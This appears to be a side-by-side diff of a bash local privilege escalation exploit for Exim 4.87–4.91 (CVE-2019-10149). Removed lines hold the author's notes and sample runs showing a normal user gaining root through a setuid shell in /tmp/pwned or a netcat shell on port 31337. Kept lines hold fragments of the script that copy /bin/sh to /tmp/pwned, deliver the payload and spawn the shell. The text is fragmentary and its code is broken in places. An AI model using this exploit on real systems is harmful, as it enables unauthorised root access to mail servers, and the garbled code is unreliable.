1 | #!/bin/bash | |
2 | METHOD="setuid" # default method | |
3 | - | # |
3 | + | |
4 | - | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit |
4 | + | |
5 | - | # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> |
5 | + | |
6 | - | # |
6 | + | |
7 | - | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). |
7 | + | |
8 | - | # Improper validation of recipient address in deliver_message() |
8 | + | |
9 | - | # function in /src/deliver.c may lead to remote command execution. |
9 | + | |
10 | - | # (CVE-2019-10149) |
10 | + | |
11 | - | # |
11 | + | |
12 | - | # This is a local privilege escalation exploit for "The Return |
12 | + | |
13 | - | # of the WIZard" vulnerability reported by the Qualys Security |
13 | + | |
14 | - | # Advisory team. |
14 | + | |
15 | - | # |
15 | + | |
16 | - | # Credits: |
16 | + | |
17 | - | # Qualys Security Advisory team (kudos for your amazing research!) |
17 | + | |
18 | - | # Dennis 'dhn' Herrmann (/dev/tcp technique) |
18 | + | |
19 | - | # |
19 | + | |
20 | - | # Usage (setuid method): |
20 | + | |
21 | - | # $ id |
21 | + | |
22 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
22 | + | |
23 | - | # $ ./raptor_exim_wiz -m setuid |
23 | + | |
24 | - | # Preparing setuid shell helper... |
24 | + | |
25 | - | # Delivering setuid payload... |
25 | + | |
26 | - | # [...] |
26 | + | |
27 | - | # Waiting 5 seconds... |
27 | + | |
28 | - | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned |
28 | + | |
29 | - | # # id |
29 | + | |
30 | - | # uid=0(root) gid=0(root) groups=0(root) |
30 | + | |
31 | - | # |
31 | + | |
32 | - | # Usage (netcat method): |
32 | + | |
33 | - | # $ id |
33 | + | |
34 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
34 | + | |
35 | - | # $ ./raptor_exim_wiz -m netcat |
35 | + | |
36 | - | # Delivering netcat payload... |
36 | + | |
37 | - | # Waiting 5 seconds... |
37 | + | |
38 | - | # localhost [127.0.0.1] 31337 (?) open |
38 | + | |
39 | - | # id |
39 | + | |
40 | - | # uid=0(root) gid=0(root) groups=0(root) |
40 | + | |
41 | - | # |
41 | + | |
42 | - | # Vulnerable platforms: |
42 | + | |
43 | - | # Exim 4.87 - 4.91 |
43 | + | |
44 | - | # |
44 | + | |
45 | - | # Tested against: |
45 | + | |
46 | - | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] |
46 | + | |
47 | - | # |
47 | + | |
48 | echo "Problems compiling setuid shell helper, check your gcc." | |
49 | echo "Falling back to the /bin/sh method." | |
50 | cp /bin/sh /tmp/pwned | |
51 | fi | |
52 | echo | |
53 | - | # usage instructions |
53 | + | |
54 | - | function usage() |
54 | + | |
55 | echo "Delivering $METHOD payload..." | |
56 | - | echo "$0 [-m METHOD]" |
56 | + | |
57 | exploit | |
58 | - | echo "-m setuid : use the setuid payload (default)" |
58 | + | |
59 | - | echo "-m netcat : use the netcat payload" |
59 | + | |
60 | # wait for the magic to happen and spawn our shell | |
61 | - | exit 1 |
61 | + | |
62 | sleep 5 | |
63 | ls -l /tmp/pwned | |
64 | /tmp/pwned |